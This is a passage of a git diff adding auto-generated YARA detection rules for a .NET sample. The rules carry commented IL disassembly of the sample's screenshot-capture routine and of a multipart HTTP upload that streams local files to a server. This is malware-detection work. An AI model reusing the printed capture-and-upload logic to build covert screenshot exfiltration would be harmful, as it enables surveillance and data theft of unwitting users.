DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 00 DE ?? 13 ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE ?? 00 06 14 FE 03 13 ?? 11 ?? 2C ?? 06 6F ?? ?? ?? ?? 00 00 DC 2A } + condition: + all of them +} + diff --git a/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar b/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar new file mode 100644 index 0000000..3404c05 --- /dev/null +++ b/yara/expected_1c444ebeba24dcba8628b7dfe5fec7c6.exe_.yar @@ -0,0 +1,1409 @@ +rule super_rule_1c444 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "1c444ebeba24dcba8628b7dfe5fec7c6" + strings: + /* +function Reqss.Reqss::b__4d 0x0600006d@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - save image in .NET + 133F 02 ldarg.0 + 1340 7b a8 00 00 04 ldfld _temp_image_ + 1345 02 ldarg.0 + 1346 7b 9e 00 00 04 ldfld _temp_dir1 + 134B 28 63 00 00 0a call System.Drawing.Imaging.ImageFormat::get_Jpeg + 1350 6f 64 00 00 0a callvirt System.Drawing.Image::Save + 1355 2a ret + */ + $c0 = { 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureWindow 0x06000073@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - capture screenshot + - unmanaged call + 1F74 03 ldarg.1 + 1F75 28 7d 00 00 06 call GetWindowDC + 1F7A 0a stloc.0 + 1F7B 12 01 ldloca.s local(0x0001) + 1F7D fe 15 0a 00 00 02 initobj .RECT + 1F83 03 ldarg.1 + 1F84 12 01 ldloca.s local(0x0001) + 1F86 28 7f 00 00 06 call GetWindowRect + 1F8B 26 pop + 1F8C 12 01 ldloca.s local(0x0001) + 1F8E 7b 7b 00 00 04 ldfld right + 1F93 12 01 ldloca.s local(0x0001) + 1F95 7b 79 00 00 04 ldfld left + 1F9A 59 sub + 1F9B 0c stloc.2 + 1F9C 12 01 ldloca.s local(0x0001) + 1F9E 7b 7c 00 00 04 ldfld bottom + 1FA3 12 01 ldloca.s local(0x0001) + 1FA5 7b 7a 00 00 04 ldfld top + 1FAA 59 sub + 1FAB 0d stloc.3 + 1FAC 06 ldloc.0 + 1FAD 28 77 00 00 06 call CreateCompatibleDC + 1FB2 13 04 stloc.s local(0x0004) + 1FB4 06 ldloc.0 + 1FB5 08 ldloc.2 + 1FB6 09 ldloc.3 + 1FB7 28 76 00 00 06 call CreateCompatibleBitmap + 1FBC 13 05 stloc.s local(0x0005) + 1FBE 11 04 ldloc.s local(0x0004) + 1FC0 11 05 ldloc.s local(0x0005) + 1FC2 28 7a 00 00 06 call SelectObject + 1FC7 13 06 stloc.s local(0x0006) + 1FC9 11 04 ldloc.s local(0x0004) + 1FCB 16 ldc.i4.0 + 1FCC 16 ldc.i4.0 + 1FCD 08 ldloc.2 + 1FCE 09 ldloc.3 + 1FCF 06 ldloc.0 + 1FD0 16 ldc.i4.0 + 1FD1 16 ldc.i4.0 + 1FD2 20 20 00 cc 00 ldc.i4 0xcc0020 + 1FD7 28 75 00 00 06 call BitBlt + 1FDC 26 pop + 1FDD 11 04 ldloc.s local(0x0004) + 1FDF 11 06 ldloc.s local(0x0006) + 1FE1 28 7a 00 00 06 call SelectObject + 1FE6 26 pop + 1FE7 11 04 ldloc.s local(0x0004) + 1FE9 28 78 00 00 06 call DeleteDC + 1FEE 26 pop + 1FEF 03 ldarg.1 + 1FF0 06 ldloc.0 + 1FF1 28 7e 00 00 06 call ReleaseDC + 1FF6 26 pop + 1FF7 11 05 ldloc.s local(0x0005) + 1FF9 28 65 00 00 0a call System.Drawing.Image::FromHbitmap + 1FFE 13 07 stloc.s local(0x0007) + 2000 11 05 ldloc.s local(0x0005) + 2002 28 79 00 00 06 call DeleteObject + 2007 26 pop + 2008 11 07 ldloc.s local(0x0007) + 200A 2a ret + */ + $c1 = { 03 28 ?? ?? ?? ?? 0A 12 ?? FE 15 ?? ?? ?? ?? 03 12 ?? 28 ?? ?? ?? ?? 26 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0C 12 ?? 7B ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 59 0D 06 28 ?? ?? ?? ?? 13 ?? 06 08 09 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 16 08 09 06 16 16 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 11 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 26 03 06 28 ?? ?? ?? ?? 26 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 26 11 ?? 2A } + /* +function Uploadss.Uploadss::MultiPart 0x06000096@1c444ebeba24dcba8628b7dfe5fec7c6 with 7 features: + - create HTTP request + - get file size + - receive HTTP response + - send HTTP request + - send data + - send request in .NET + - set web proxy in .NET + 2AA8 72 01 00 00 70 ldstr "" + 2AAD 0a stloc.0 + 2AAE 03 ldarg.1 + 2AAF 28 97 00 00 0a call System.Net.WebRequest::Create + 2AB4 74 58 00 00 01 castclass System.Net.HttpWebRequest + 2AB9 0b stloc.1 + 2ABA 07 ldloc.1 + 2ABB 1c ldc.i4.6 + 2ABC 73 98 00 00 0a newobj System.Net.Cache.RequestCachePolicy::.ctor + 2AC1 6f 99 00 00 0a callvirt System.Net.WebRequest::set_CachePolicy + 2AC6 07 ldloc.1 + 2AC7 14 ldnull + 2AC8 6f 9a 00 00 0a callvirt System.Net.WebRequest::set_Proxy + 2ACD 07 ldloc.1 + 2ACE 19 ldc.i4.3 + 2ACF 6f 9b 00 00 0a callvirt System.Net.HttpWebRequest::set_AutomaticDecompression + 2AD4 07 ldloc.1 + 2AD5 20 30 75 00 00 ldc.i4 0x7530 + 2ADA 6f 9c 00 00 0a callvirt System.Net.WebRequest::set_Timeout + 2ADF 07 ldloc.1 + 2AE0 28 9d 00 00 0a call System.Text.Encoding::get_Default + 2AE5 1a ldc.i4.4 + 2AE6 8d 3d 00 00 01 newarr System.Byte + 2AEB 25 dup + 2AEC d0 b1 00 00 04 ldtoken $$method0x600002a-1 + 2AF1 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2AF6 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2AFB 6f 9f 00 00 0a callvirt System.Net.WebRequest::set_Method + 2B00 28 a0 00 00 0a call System.DateTime::get_UtcNow + 2B05 13 1e stloc.s local(0x001E) + 2B07 12 1e ldloca.s local(0x001E) + 2B09 20 b2 07 00 00 ldc.i4 0x7b2 + 2B0E 17 ldc.i4.1 + 2B0F 17 ldc.i4.1 + 2B10 73 a1 00 00 0a newobj System.DateTime::.ctor + 2B15 28 a2 00 00 0a call System.DateTime::Subtract + 2B1A 13 1f stloc.s local(0x001F) + 2B1C 12 1f ldloca.s local(0x001F) + 2B1E 28 a3 00 00 0a call System.TimeSpan::get_TotalMilliseconds + 2B23 6a conv.i8 + 2B24 0c stloc.2 + 2B25 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B2A 1f 14 ldc.i4.s 0x14 + 2B2C 8d 3d 00 00 01 newarr System.Byte + 2B31 25 dup + 2B32 d0 b2 00 00 04 ldtoken $$method0x600002a-2 + 2B37 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B3C 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B41 0d stloc.3 + 2B42 09 ldloc.3 + 2B43 08 ldloc.2 + 2B44 8c 31 00 00 01 box System.Int64 + 2B49 28 52 00 00 0a call System.String::Concat + 2B4E 13 04 stloc.s local(0x0004) + 2B50 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B55 18 ldc.i4.2 + 2B56 8d 3d 00 00 01 newarr System.Byte + 2B5B 13 20 stloc.s local(0x0020) + 2B5D 11 20 ldloc.s local(0x0020) + 2B5F 16 ldc.i4.0 + 2B60 1f 0d ldc.i4.s 0xd + 2B62 9c stelem.i1 + 2B63 11 20 ldloc.s local(0x0020) + 2B65 17 ldc.i4.1 + 2B66 1f 0a ldc.i4.s 0xa + 2B68 9c stelem.i1 + 2B69 11 20 ldloc.s local(0x0020) + 2B6B 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B70 26 pop + 2B71 07 ldloc.1 + 2B72 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B77 1f 21 ldc.i4.s 0x21 + 2B79 8d 3d 00 00 01 newarr System.Byte + 2B7E 25 dup + 2B7F d0 b3 00 00 04 ldtoken $$method0x600002a-3 + 2B84 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2B89 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2B8E 11 04 ldloc.s local(0x0004) + 2B90 28 a4 00 00 0a call System.String::Format + 2B95 6f a5 00 00 0a callvirt System.Net.WebRequest::set_ContentType + 2B9A 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2B9F 18 ldc.i4.2 + 2BA0 8d 3d 00 00 01 newarr System.Byte + 2BA5 13 21 stloc.s local(0x0021) + 2BA7 11 21 ldloc.s local(0x0021) + 2BA9 16 ldc.i4.0 + 2BAA 1f 2d ldc.i4.s 0x2d + 2BAC 9c stelem.i1 + 2BAD 11 21 ldloc.s local(0x0021) + 2BAF 17 ldc.i4.1 + 2BB0 1f 2d ldc.i4.s 0x2d + 2BB2 9c stelem.i1 + 2BB3 11 21 ldloc.s local(0x0021) + 2BB5 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BBA 11 04 ldloc.s local(0x0004) + 2BBC 28 50 00 00 0a call System.String::Concat + 2BC1 13 04 stloc.s local(0x0004) + 2BC3 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BC8 11 04 ldloc.s local(0x0004) + 2BCA 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2BCF 13 05 stloc.s local(0x0005) + 2BD1 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BD6 1f 2e ldc.i4.s 0x2e + 2BD8 8d 3d 00 00 01 newarr System.Byte + 2BDD 25 dup + 2BDE d0 b4 00 00 04 ldtoken $$method0x600002a-4 + 2BE3 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2BE8 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2BED 13 06 stloc.s local(0x0006) + 2BEF 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2BF4 1f 51 ldc.i4.s 0x51 + 2BF6 8d 3d 00 00 01 newarr System.Byte + 2BFB 25 dup + 2BFC d0 b5 00 00 04 ldtoken $$method0x600002a-5 + 2C01 28 9e 00 00 0a call System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray + 2C06 6f 48 00 00 0a callvirt System.Text.Encoding::GetString + 2C0B 13 07 stloc.s local(0x0007) + 2C0D 16 ldc.i4.0 + 2C0E 6a conv.i8 + 2C0F 13 08 stloc.s local(0x0008) + 2C11 11 08 ldloc.s local(0x0008) + 2C13 11 05 ldloc.s local(0x0005) + 2C15 8e ldlen + 2C16 69 conv.i4 + 2C17 6a conv.i8 + 2C18 58 add + 2C19 13 08 stloc.s local(0x0008) + 2C1B 04 ldarg.2 + 2C1C 6f a6 00 00 0a callvirt GetEnumerator + 2C21 13 22 stloc.s local(0x0022) + 2C23 2b 5a br.s 0x2c7f + 2C25 12 22 ldloca.s local(0x0022) + 2C27 28 a7 00 00 0a call get_Current + 2C2C 13 09 stloc.s local(0x0009) + 2C2E 11 06 ldloc.s local(0x0006) + 2C30 11 09 ldloc.s local(0x0009) + 2C32 7b a9 00 00 04 ldfld name + 2C37 28 a4 00 00 0a call System.String::Format + 2C3C 11 09 ldloc.s local(0x0009) + 2C3E 7b aa 00 00 04 ldfld value + 2C43 28 a8 00 00 0a call System.Uri::EscapeDataString + 2C48 28 50 00 00 0a call System.String::Concat + 2C4D 13 0a stloc.s local(0x000A) + 2C4F 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2C54 11 0a ldloc.s local(0x000A) + 2C56 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2C5B 13 0b stloc.s local(0x000B) + 2C5D 11 08 ldloc.s local(0x0008) + 2C5F 18 ldc.i4.2 + 2C60 6a conv.i8 + 2C61 58 add + 2C62 13 08 stloc.s local(0x0008) + 2C64 11 08 ldloc.s local(0x0008) + 2C66 11 0b ldloc.s local(0x000B) + 2C68 8e ldlen + 2C69 69 conv.i4 + 2C6A 6a conv.i8 + 2C6B 58 add + 2C6C 13 08 stloc.s local(0x0008) + 2C6E 11 08 ldloc.s local(0x0008) + 2C70 18 ldc.i4.2 + 2C71 6a conv.i8 + 2C72 58 add + 2C73 13 08 stloc.s local(0x0008) + 2C75 11 08 ldloc.s local(0x0008) + 2C77 11 05 ldloc.s local(0x0005) + 2C79 8e ldlen + 2C7A 69 conv.i4 + 2C7B 6a conv.i8 + 2C7C 58 add + 2C7D 13 08 stloc.s local(0x0008) + 2C7F 12 22 ldloca.s local(0x0022) + 2C81 28 a9 00 00 0a call MoveNext + 2C86 2d 9d brtrue.s 0x2c25 + 2C88 de 0e leave.s 0x2c98 + 2C8A 12 22 ldloca.s local(0x0022) + 2C8C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2C92 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2C97 dc endfinally + 2C98 05 ldarg.3 + 2C99 6f aa 00 00 0a callvirt GetEnumerator + 2C9E 13 23 stloc.s local(0x0023) + 2CA0 2b 76 br.s 0x2d18 + 2CA2 12 23 ldloca.s local(0x0023) + 2CA4 28 ab 00 00 0a call get_Current + 2CA9 13 0c stloc.s local(0x000C) + 2CAB 11 07 ldloc.s local(0x0007) + 2CAD 11 0c ldloc.s local(0x000C) + 2CAF 7b ab 00 00 04 ldfld name + 2CB4 11 0c ldloc.s local(0x000C) + 2CB6 7b ac 00 00 04 ldfld filepath + 2CBB 28 ac 00 00 0a call System.IO.Path::GetFileName + 2CC0 11 0c ldloc.s local(0x000C) + 2CC2 7b ad 00 00 04 ldfld contenttype + 2CC7 28 ad 00 00 0a call System.String::Format + 2CCC 13 0d stloc.s local(0x000D) + 2CCE 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2CD3 11 0d ldloc.s local(0x000D) + 2CD5 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2CDA 13 0e stloc.s local(0x000E) + 2CDC 11 08 ldloc.s local(0x0008) + 2CDE 18 ldc.i4.2 + 2CDF 6a conv.i8 + 2CE0 58 add + 2CE1 13 08 stloc.s local(0x0008) + 2CE3 11 08 ldloc.s local(0x0008) + 2CE5 11 0e ldloc.s local(0x000E) + 2CE7 8e ldlen + 2CE8 69 conv.i4 + 2CE9 6a conv.i8 + 2CEA 58 add + 2CEB 13 08 stloc.s local(0x0008) + 2CED 11 0c ldloc.s local(0x000C) + 2CEF 7b ac 00 00 04 ldfld filepath + 2CF4 73 24 00 00 0a newobj System.IO.FileInfo::.ctor + 2CF9 13 0f stloc.s local(0x000F) + 2CFB 11 08 ldloc.s local(0x0008) + 2CFD 11 0f ldloc.s local(0x000F) + 2CFF 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 2D04 58 add + 2D05 13 08 stloc.s local(0x0008) + 2D07 11 08 ldloc.s local(0x0008) + 2D09 18 ldc.i4.2 + 2D0A 6a conv.i8 + 2D0B 58 add + 2D0C 13 08 stloc.s local(0x0008) + 2D0E 11 08 ldloc.s local(0x0008) + 2D10 11 05 ldloc.s local(0x0005) + 2D12 8e ldlen + 2D13 69 conv.i4 + 2D14 6a conv.i8 + 2D15 58 add + 2D16 13 08 stloc.s local(0x0008) + 2D18 12 23 ldloca.s local(0x0023) + 2D1A 28 ae 00 00 0a call MoveNext + 2D1F 2d 81 brtrue.s 0x2ca2 + 2D21 de 0e leave.s 0x2d31 + 2D23 12 23 ldloca.s local(0x0023) + 2D25 fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2D2B 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2D30 dc endfinally + 2D31 11 08 ldloc.s local(0x0008) + 2D33 18 ldc.i4.2 + 2D34 6a conv.i8 + 2D35 58 add + 2D36 13 08 stloc.s local(0x0008) + 2D38 11 08 ldloc.s local(0x0008) + 2D3A 18 ldc.i4.2 + 2D3B 6a conv.i8 + 2D3C 58 add + 2D3D 13 08 stloc.s local(0x0008) + 2D3F 07 ldloc.1 + 2D40 11 08 ldloc.s local(0x0008) + 2D42 6f af 00 00 0a callvirt System.Net.WebRequest::set_ContentLength + 2D47 07 ldloc.1 + 2D48 6f b0 00 00 0a callvirt System.Net.WebRequest::GetRequestStream + 2D4D 13 10 stloc.s local(0x0010) + 2D4F 11 10 ldloc.s local(0x0010) + 2D51 11 05 ldloc.s local(0x0005) + 2D53 16 ldc.i4.0 + 2D54 11 05 ldloc.s local(0x0005) + 2D56 8e ldlen + 2D57 69 conv.i4 + 2D58 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2D5D 04 ldarg.2 + 2D5E 6f a6 00 00 0a callvirt GetEnumerator + 2D63 13 24 stloc.s local(0x0024) + 2D65 38 92 00 00 00 br 0x2dfc + 2D6A 12 24 ldloca.s local(0x0024) + 2D6C 28 a7 00 00 0a call get_Current + 2D71 13 11 stloc.s local(0x0011) + 2D73 11 06 ldloc.s local(0x0006) + 2D75 11 11 ldloc.s local(0x0011) + 2D77 7b a9 00 00 04 ldfld name + 2D7C 28 a4 00 00 0a call System.String::Format + 2D81 11 11 ldloc.s local(0x0011) + 2D83 7b aa 00 00 04 ldfld value + 2D88 28 a8 00 00 0a call System.Uri::EscapeDataString + 2D8D 28 50 00 00 0a call System.String::Concat + 2D92 13 12 stloc.s local(0x0012) + 2D94 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2D99 11 12 ldloc.s local(0x0012) + 2D9B 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2DA0 13 13 stloc.s local(0x0013) + 2DA2 11 10 ldloc.s local(0x0010) + 2DA4 18 ldc.i4.2 + 2DA5 8d 3d 00 00 01 newarr System.Byte + 2DAA 13 25 stloc.s local(0x0025) + 2DAC 11 25 ldloc.s local(0x0025) + 2DAE 16 ldc.i4.0 + 2DAF 1f 0d ldc.i4.s 0xd + 2DB1 9c stelem.i1 + 2DB2 11 25 ldloc.s local(0x0025) + 2DB4 17 ldc.i4.1 + 2DB5 1f 0a ldc.i4.s 0xa + 2DB7 9c stelem.i1 + 2DB8 11 25 ldloc.s local(0x0025) + 2DBA 16 ldc.i4.0 + 2DBB 18 ldc.i4.2 + 2DBC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DC1 11 10 ldloc.s local(0x0010) + 2DC3 11 13 ldloc.s local(0x0013) + 2DC5 16 ldc.i4.0 + 2DC6 11 13 ldloc.s local(0x0013) + 2DC8 8e ldlen + 2DC9 69 conv.i4 + 2DCA 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DCF 11 10 ldloc.s local(0x0010) + 2DD1 18 ldc.i4.2 + 2DD2 8d 3d 00 00 01 newarr System.Byte + 2DD7 13 26 stloc.s local(0x0026) + 2DD9 11 26 ldloc.s local(0x0026) + 2DDB 16 ldc.i4.0 + 2DDC 1f 0d ldc.i4.s 0xd + 2DDE 9c stelem.i1 + 2DDF 11 26 ldloc.s local(0x0026) + 2DE1 17 ldc.i4.1 + 2DE2 1f 0a ldc.i4.s 0xa + 2DE4 9c stelem.i1 + 2DE5 11 26 ldloc.s local(0x0026) + 2DE7 16 ldc.i4.0 + 2DE8 18 ldc.i4.2 + 2DE9 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DEE 11 10 ldloc.s local(0x0010) + 2DF0 11 05 ldloc.s local(0x0005) + 2DF2 16 ldc.i4.0 + 2DF3 11 05 ldloc.s local(0x0005) + 2DF5 8e ldlen + 2DF6 69 conv.i4 + 2DF7 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2DFC 12 24 ldloca.s local(0x0024) + 2DFE 28 a9 00 00 0a call MoveNext + 2E03 3a 62 ff ff ff brtrue 0x2d6a + 2E08 de 0e leave.s 0x2e18 + 2E0A 12 24 ldloca.s local(0x0024) + 2E0C fe 16 07 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7032 0x0 Signature_BlobIndex: 5CF + 2E12 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2E17 dc endfinally + 2E18 05 ldarg.3 + 2E19 6f aa 00 00 0a callvirt GetEnumerator + 2E1E 13 27 stloc.s local(0x0027) + 2E20 38 ea 00 00 00 br 0x2f0f + 2E25 12 27 ldloca.s local(0x0027) + 2E27 28 ab 00 00 0a call get_Current + 2E2C 13 14 stloc.s local(0x0014) + 2E2E 11 07 ldloc.s local(0x0007) + 2E30 11 14 ldloc.s local(0x0014) + 2E32 7b ab 00 00 04 ldfld name + 2E37 11 14 ldloc.s local(0x0014) + 2E39 7b ac 00 00 04 ldfld filepath + 2E3E 28 ac 00 00 0a call System.IO.Path::GetFileName + 2E43 11 14 ldloc.s local(0x0014) + 2E45 7b ad 00 00 04 ldfld contenttype + 2E4A 28 ad 00 00 0a call System.String::Format + 2E4F 13 15 stloc.s local(0x0015) + 2E51 28 29 00 00 0a call System.Text.Encoding::get_UTF8 + 2E56 11 15 ldloc.s local(0x0015) + 2E58 6f 2a 00 00 0a callvirt System.Text.Encoding::GetBytes + 2E5D 13 16 stloc.s local(0x0016) + 2E5F 11 10 ldloc.s local(0x0010) + 2E61 18 ldc.i4.2 + 2E62 8d 3d 00 00 01 newarr System.Byte + 2E67 13 28 stloc.s local(0x0028) + 2E69 11 28 ldloc.s local(0x0028) + 2E6B 16 ldc.i4.0 + 2E6C 1f 0d ldc.i4.s 0xd + 2E6E 9c stelem.i1 + 2E6F 11 28 ldloc.s local(0x0028) + 2E71 17 ldc.i4.1 + 2E72 1f 0a ldc.i4.s 0xa + 2E74 9c stelem.i1 + 2E75 11 28 ldloc.s local(0x0028) + 2E77 16 ldc.i4.0 + 2E78 18 ldc.i4.2 + 2E79 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E7E 11 10 ldloc.s local(0x0010) + 2E80 11 16 ldloc.s local(0x0016) + 2E82 16 ldc.i4.0 + 2E83 11 16 ldloc.s local(0x0016) + 2E85 8e ldlen + 2E86 69 conv.i4 + 2E87 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2E8C 11 14 ldloc.s local(0x0014) + 2E8E 7b ac 00 00 04 ldfld filepath + 2E93 19 ldc.i4.3 + 2E94 17 ldc.i4.1 + 2E95 73 b1 00 00 0a newobj System.IO.FileStream::.ctor + 2E9A 13 17 stloc.s local(0x0017) + 2E9C 20 00 00 10 00 ldc.i4 0x100000 + 2EA1 8d 3d 00 00 01 newarr System.Byte + 2EA6 13 18 stloc.s local(0x0018) + 2EA8 11 17 ldloc.s local(0x0017) + 2EAA 11 18 ldloc.s local(0x0018) + 2EAC 16 ldc.i4.0 + 2EAD 11 18 ldloc.s local(0x0018) + 2EAF 8e ldlen + 2EB0 69 conv.i4 + 2EB1 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2EB6 13 19 stloc.s local(0x0019) + 2EB8 2b 1c br.s 0x2ed6 + 2EBA 11 10 ldloc.s local(0x0010) + 2EBC 11 18 ldloc.s local(0x0018) + 2EBE 16 ldc.i4.0 + 2EBF 11 19 ldloc.s local(0x0019) + 2EC1 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2EC6 11 17 ldloc.s local(0x0017) + 2EC8 11 18 ldloc.s local(0x0018) + 2ECA 16 ldc.i4.0 + 2ECB 11 18 ldloc.s local(0x0018) + 2ECD 8e ldlen + 2ECE 69 conv.i4 + 2ECF 6f 84 00 00 0a callvirt System.IO.Stream::Read + 2ED4 13 19 stloc.s local(0x0019) + 2ED6 11 19 ldloc.s local(0x0019) + 2ED8 16 ldc.i4.0 + 2ED9 30 df bgt.s 0x2eba + 2EDB 11 17 ldloc.s local(0x0017) + 2EDD 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2EE2 11 10 ldloc.s local(0x0010) + 2EE4 18 ldc.i4.2 + 2EE5 8d 3d 00 00 01 newarr System.Byte + 2EEA 13 29 stloc.s local(0x0029) + 2EEC 11 29 ldloc.s local(0x0029) + 2EEE 16 ldc.i4.0 + 2EEF 1f 0d ldc.i4.s 0xd + 2EF1 9c stelem.i1 + 2EF2 11 29 ldloc.s local(0x0029) + 2EF4 17 ldc.i4.1 + 2EF5 1f 0a ldc.i4.s 0xa + 2EF7 9c stelem.i1 + 2EF8 11 29 ldloc.s local(0x0029) + 2EFA 16 ldc.i4.0 + 2EFB 18 ldc.i4.2 + 2EFC 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F01 11 10 ldloc.s local(0x0010) + 2F03 11 05 ldloc.s local(0x0005) + 2F05 16 ldc.i4.0 + 2F06 11 05 ldloc.s local(0x0005) + 2F08 8e ldlen + 2F09 69 conv.i4 + 2F0A 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F0F 12 27 ldloca.s local(0x0027) + 2F11 28 ae 00 00 0a call MoveNext + 2F16 3a 0a ff ff ff brtrue 0x2e25 + 2F1B de 0e leave.s 0x2f2b + 2F1D 12 27 ldloca.s local(0x0027) + 2F1F fe 16 08 00 00 1b constrained. [CLR_METADATA_TABLE_TYPESPEC] + 0x7034 0x0 Signature_BlobIndex: 5DC + 2F25 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 2F2A dc endfinally + 2F2B 11 10 ldloc.s local(0x0010) + 2F2D 18 ldc.i4.2 + 2F2E 8d 3d 00 00 01 newarr System.Byte + 2F33 13 2a stloc.s local(0x002A) + 2F35 11 2a ldloc.s local(0x002A) + 2F37 16 ldc.i4.0 + 2F38 1f 2d ldc.i4.s 0x2d + 2F3A 9c stelem.i1 + 2F3B 11 2a ldloc.s local(0x002A) + 2F3D 17 ldc.i4.1 + 2F3E 1f 2d ldc.i4.s 0x2d + 2F40 9c stelem.i1 + 2F41 11 2a ldloc.s local(0x002A) + 2F43 16 ldc.i4.0 + 2F44 18 ldc.i4.2 + 2F45 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F4A 11 10 ldloc.s local(0x0010) + 2F4C 18 ldc.i4.2 + 2F4D 8d 3d 00 00 01 newarr System.Byte + 2F52 13 2b stloc.s local(0x002B) + 2F54 11 2b ldloc.s local(0x002B) + 2F56 16 ldc.i4.0 + 2F57 1f 0d ldc.i4.s 0xd + 2F59 9c stelem.i1 + 2F5A 11 2b ldloc.s local(0x002B) + 2F5C 17 ldc.i4.1 + 2F5D 1f 0a ldc.i4.s 0xa + 2F5F 9c stelem.i1 + 2F60 11 2b ldloc.s local(0x002B) + 2F62 16 ldc.i4.0 + 2F63 18 ldc.i4.2 + 2F64 6f 89 00 00 0a callvirt System.IO.Stream::Write + 2F69 11 10 ldloc.s local(0x0010) + 2F6B 6f 8a 00 00 0a callvirt System.IO.Stream::Flush + 2F70 11 10 ldloc.s local(0x0010) + 2F72 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2F77 07 ldloc.1 + 2F78 6f b3 00 00 0a callvirt System.Net.WebRequest::GetResponse + 2F7D 74 67 00 00 01 castclass System.Net.HttpWebResponse + 2F82 13 1a stloc.s local(0x001A) + 2F84 11 1a ldloc.s local(0x001A) + 2F86 6f b4 00 00 0a callvirt System.Net.WebResponse::GetResponseStream + 2F8B 13 1b stloc.s local(0x001B) + 2F8D 11 1b ldloc.s local(0x001B) + 2F8F 73 b5 00 00 0a newobj System.IO.StreamReader::.ctor + 2F94 13 1c stloc.s local(0x001C) + 2F96 11 1c ldloc.s local(0x001C) + 2F98 6f b6 00 00 0a callvirt System.IO.TextReader::ReadToEnd + 2F9D 0a stloc.0 + 2F9E 11 1c ldloc.s local(0x001C) + 2FA0 6f b7 00 00 0a callvirt System.IO.TextReader::Close + 2FA5 11 1b ldloc.s local(0x001B) + 2FA7 6f b2 00 00 0a callvirt System.IO.Stream::Close + 2FAC 11 1a ldloc.s local(0x001A) + 2FAE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FB3 de 18 leave.s 0x2fcd + 2FB5 13 1d stloc.s local(0x001D) + 2FB7 11 1d ldloc.s local(0x001D) + 2FB9 6f b9 00 00 0a callvirt System.Net.WebException::get_Response + 2FBE 6f b8 00 00 0a callvirt System.Net.WebResponse::Close + 2FC3 de 03 leave.s 0x2fc8 + 2FC5 26 pop + 2FC6 de 00 leave.s 0x2fc8 + 2FC8 de 03 leave.s 0x2fcd + 2FCA 26 pop + 2FCB de 00 leave.s 0x2fcd + 2FCD 06 ldloc.0 + 2FCE 2a ret + */ + $c2 = { 72 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 0B 07 1C 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 14 6F ?? ?? ?? ?? 07 19 6F ?? ?? ?? ?? 07 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 28 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25 D0 ?? ?? 